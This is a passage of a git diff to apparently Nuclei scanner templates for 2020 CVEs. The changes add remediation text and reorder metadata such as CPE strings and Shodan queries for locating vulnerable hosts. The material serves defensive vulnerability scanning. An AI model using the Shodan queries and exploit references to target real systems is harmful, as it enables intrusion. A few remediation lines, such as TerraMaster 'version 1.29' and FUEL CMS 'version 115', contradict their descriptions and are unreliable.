https://nvd.nist.gov/vuln/detail/CVE-2020-14179 @@ -13,13 +15,13 @@ info: cvss-score: 5.3 cve-id: CVE-2020-14179 epss-score: 0.0047 - cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* epss-percentile: 0.72498 + cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira_data_center + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2020,atlassian,jira,exposure,disclosure http: diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 994e9f016d..7b10964739 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -5,6 +5,8 @@ info: author: bjhulst severity: medium description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. + remediation: | + Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-71560 - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html @@ -15,13 +17,13 @@ info: cve-id: CVE-2020-14181 cwe-id: CWE-200 epss-score: 0.96932 - cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* epss-percentile: 0.99604 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: data_center + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2020,atlassian,jira,packetstorm http: diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index a040285363..1ca2d335d1 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. + remediation: | + Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/agentejo/cockpit/issues/1310 - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 @@ -14,11 +16,11 @@ info: cve-id: CVE-2020-14408 cwe-id: CWE-79 epss-score: 0.00113 - cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* epss-percentile: 0.44064 + cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: agentejo product: cockpit tags: cve,cve2020,cockpit,agentejo,xss,oss diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 4a0571c133..0dad2fc4c5 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. + remediation: | + Upgrade to a patched version of NeDi or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8 - https://nvd.nist.gov/vuln/detail/CVE-2020-14413 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-14413 cwe-id: CWE-79 epss-score: 0.00095 - cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* epss-percentile: 0.39345 + cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nedi diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 067de8e53c..d816692ac2 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update. + remediation: | + Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: - https://github.com/pprietosanchez/CVE-2020-14750 - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html @@ -17,14 +19,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-14750 epss-score: 0.97553 - cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* epss-percentile: 0.99993 + cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Weblogic Application Server" verified: true + max-request: 1 vendor: oracle product: fusion_middleware + shodan-query: http.html:"Weblogic Application Server" tags: packetstorm,cve,cve2020,rce,oracle,weblogic,unauth,kev http: diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 3b14004ff6..ac6913782f 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -5,6 +5,8 @@ info: author: Ivo Palazzolo (@palaziv) severity: high description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via "getPreviewImage." + remediation: | + Apply the latest security patches and updates provided by Oracle to fix this vulnerability. reference: - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html - https://www.oracle.com/security-alerts/cpuoct2020.html @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-14864 cwe-id: CWE-22 epss-score: 0.32452 - cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:* epss-percentile: 0.96445 + cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 7f2865a76a..1bf1e299b8 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server. + remediation: | + Apply the latest security patches provided by Oracle to fix the vulnerability. reference: - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf - https://www.oracle.com/security-alerts/cpuoct2020.html @@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-14882 epss-score: 0.97537 - cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* epss-percentile: 0.99988 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 8dddb0254a..814bba4b47 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. + remediation: | + Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 @@ -16,14 +18,14 @@ info: cvss-score: 7.2 cve-id: CVE-2020-14883 epss-score: 0.97537 - cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* epss-percentile: 0.99989 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"Oracle PeopleSoft Sign-in" + max-request: 1 vendor: oracle product: weblogic_server + shodan-query: title:"Oracle PeopleSoft Sign-in" tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020 variables: str: "{{randstr}}" diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index 7b7278d9de..29c3fdd32d 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion. + remediation: | + Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability. reference: - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html - https://www.supremainc.com/en/support/biostar-2-pakage.asp @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-15050 cwe-id: CWE-22 epss-score: 0.13878 - cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* epss-percentile: 0.94934 + cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: supremainc diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index 5ad478bc16..6a8807160c 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the vendor-provided patch or upgrade to a non-vulnerable version of Traefik. reference: - https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik - https://github.com/containous/traefik/releases/tag/v2.2.8 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-15129 cwe-id: CWE-601 epss-score: 0.00519 - cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* epss-percentile: 0.73814 + cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: traefik diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index dd228c254b..7081184174 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -5,20 +5,20 @@ info: author: pikpikcu severity: critical description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. + remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory. reference: - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md - https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99 - https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj - remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2020-15148 cwe-id: CWE-502 epss-score: 0.02226 - cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* epss-percentile: 0.88079 + cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: yiiframework diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 576108a873..523af36581 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -5,6 +5,8 @@ info: author: becivells severity: critical description: Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework. + remediation: | + Apply the latest security patches provided by the Nette Framework to fix the deserialization vulnerability. reference: - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-15227 cwe-id: CWE-94,CWE-74 epss-score: 0.97364 - cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:* epss-percentile: 0.99844 + cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nette diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index 383d2812b3..d65405b195 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -5,6 +5,8 @@ info: author: Akash.C severity: medium description: TileServer GL through 3.0.0 is vulnerable to reflected cross-site scripting via server.js because the content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page. + remediation: | + Upgrade TileServer GL to a version higher than 3.0.0 or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/maptiler/tileserver-gl/issues/461 - http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-15500 cwe-id: CWE-79 epss-score: 0.0021 - cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* epss-percentile: 0.58204 + cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tileserver diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index cbe78c71d5..40b56112a3 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -9,6 +9,8 @@ info: author: dwisiswant0 severity: critical description: A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier contain a vulnerability that allows remote attackers to execute arbitrary code via unspecified vectors. + remediation: | + Upgrade MobileIron Core & Connector and Sentry to versions above v10.6 & v9.8 respectively reference: - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 @@ -21,8 +23,8 @@ info: cve-id: CVE-2020-15505 cwe-id: CWE-706 epss-score: 0.97504 - cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:* epss-percentile: 0.99964 + cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mobileiron diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index 4179598619..1ec5541c20 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. + remediation: | + Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-15568 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-15568 cwe-id: CWE-913 epss-score: 0.96537 - cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* epss-percentile: 0.99422 + cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: terra-master diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 7c7a15a98b..bb876fa7dd 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue. + remediation: | + Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later). reference: - https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/ @@ -16,11 +18,11 @@ info: cvss-score: 7.2 cve-id: CVE-2020-15867 epss-score: 0.96465 - cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* epss-percentile: 0.99385 + cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: - max-request: 7 verified: true + max-request: 7 vendor: gogs product: gogs tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 31e66e2548..9c81fb4583 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | D-Link DIR-816L devices 2.x before 1.10b04Beta02 contains a cross-site scripting vulnerability. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter before being printed on the webpage. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow for theft of cookie-based authentication credentials and launch of other attacks. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://research.loginsoft.com/bugs/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/ - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169 @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-15895 cwe-id: CWE-79 epss-score: 0.00187 - cpe: cpe:2.3:o:d-link:dir-816l_firmware:2.06:*:*:*:*:*:*:* epss-percentile: 0.55288 + cpe: cpe:2.3:o:d-link:dir-816l_firmware:2.06:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: html:"DIR-816L" vendor: d-link product: dir-816l_firmware + shodan-query: html:"DIR-816L" tags: cve,cve2020,dlink,xss http: diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml index 853730a203..a2e50b0914 100644 --- a/http/cves/2020/CVE-2020-15920.yaml +++ b/http/cves/2020/CVE-2020-15920.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required. + remediation: | + Upgrade Mida eFramework to a version higher than 2.9.0 to mitigate the vulnerability. reference: - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html - http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-15920 cwe-id: CWE-78 epss-score: 0.97263 - cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:* epss-percentile: 0.9977 + cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: midasolutions diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index 7465dea796..a536e8c9ad 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. + remediation: | + Apply the latest firmware update provided by Cisco to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html - https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html @@ -15,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-16139 epss-score: 0.01181 - cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.83291 + cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index 85411d171f..c47950a257 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SaltStack Salt through 3002 allows an unauthenticated user with network access to the Salt API to use shell injections to run code on the Salt-API using the SSH client. + remediation: | + Upgrade to a patched version of SaltStack (>=3003) to mitigate this vulnerability. reference: - https://saltproject.io/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/ - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag @@ -18,8 +20,8 @@ info: cve-id: CVE-2020-16846 cwe-id: CWE-78 epss-score: 0.97514 - cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* epss-percentile: 0.99971 + cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: saltstack diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index 6e6a57db01..74abe037fc 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Microsoft SharePoint is vulnerable to a remote code execution when the software fails to check the source markup of an application package. + remediation: | + Apply the latest security updates provided by Microsoft to address this vulnerability. reference: - https://srcincite.io/pocs/cve-2020-16952.py.txt - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-16952 cwe-id: CWE-346 epss-score: 0.19008 - cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:* epss-percentile: 0.95588 + cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index c4b22882a0..265447c295 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php. + remediation: | + Upgrade to Nova Lite version 1.3.9 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 - https://nvd.nist.gov/vuln/detail/CVE-2020-17362 @@ -15,13 +17,13 @@ info: cve-id: CVE-2020-17362 cwe-id: CWE-79 epss-score: 0.00101 - cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40822 + cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: themeinprogress product: nova_lite + framework: wordpress tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,unauth http: diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 76b8c3e30f..4bf0b83c61 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. + remediation: | + Upgrade to a patched version of WSO2 Carbon Management Console (5.11 or above) or apply the provided security patch to mitigate this vulnerability. reference: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132 - https://nvd.nist.gov/vuln/detail/CVE-2020-17453 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-17453 cwe-id: CWE-79 epss-score: 0.01736 - cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* epss-percentile: 0.86329 + cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wso2 diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index b81850f0a4..48ffd08882 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -5,6 +5,8 @@ info: author: gy741,edoardottt severity: critical description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ - https://nvd.nist.gov/vuln/detail/CVE-2020-17456 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-17456 cwe-id: CWE-78 epss-score: 0.97265 - cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.99771 + cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 vendor: seowonintech diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index 117d5b9929..823130a149 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items. + remediation: Fixed in version 115 reference: - https://www.exploit-db.com/exploits/48741 - https://nvd.nist.gov/vuln/detail/CVE-2020-17463 - http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html - https://getfuelcms.com/ - https://cwe.mitre.org/data/definitions/89.html - remediation: Fixed in version 115 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-17463 cwe-id: CWE-89 epss-score: 0.8963 - cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:* epss-percentile: 0.98341 + cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true - shodan-query: http.title:"fuel cms" + max-request: 3 vendor: thedaylightstudio product: fuel_cms + shodan-query: http.title:"fuel cms" tags: packetstorm,cve,cve2020,sqli,fuel-cms,kev http: diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 37cdb8796d..32401aaa7b 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: critical description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.' + remediation: | + Upgrade vBulletin to a version that is not affected by CVE-2020-17496. reference: - https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed - https://nvd.nist.gov/vuln/detail/CVE-2020-17496 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-17496 cwe-id: CWE-74 epss-score: 0.97475 - cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* epss-percentile: 0.99945 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vbulletin diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 4ece0aeb70..5ae63f48fe 100644 --- 